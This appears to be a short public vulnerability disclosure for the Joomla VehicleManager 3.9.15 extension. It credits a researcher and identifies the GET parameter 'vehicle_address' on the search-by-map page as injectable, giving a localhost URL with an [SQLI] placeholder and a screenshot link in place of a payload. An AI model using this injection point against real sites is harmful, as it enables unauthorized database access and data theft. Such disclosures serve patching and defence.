################################################ #Title: Joomla VehicleManager 3.9.15 - SQL injection #Credit: Bilal KARDADOU #Vendor: http://ordasoft.com/ #URL: https://extensions.joomla.org/extensions/extension/vertical-markets/vehicles/vehiclemanager-basic/ #Product: 'Joomla VehicleManager 3.9.15' #Developer: OrdaSoft #Extension type: Plugin #Last updated: Dec 06 2017 #Compatibility: 3.X #Google Dork: N/A ################################################ # # Description: # Vehicle Manager Basic is free automotive Joomla component for car/vehicle management and building car sale and rental websites. # # --Method=GET -p [vehicle_address] # # -u " http://127.0.0.1/joomla/index.php/vehiclemanager/search/search-by-map?vehicle_address=a[SQLI]&vehicle_search_range=1000&vehicle_search_latitude=48.3705449&vehicle_search_longitude=10.897789999999986&vehicle_cat= " # # PoC: # https://prnt.sc/hvi84s # #Bilal KARDADOU - https://www.linkedin.com/in/kardadou/) ################################################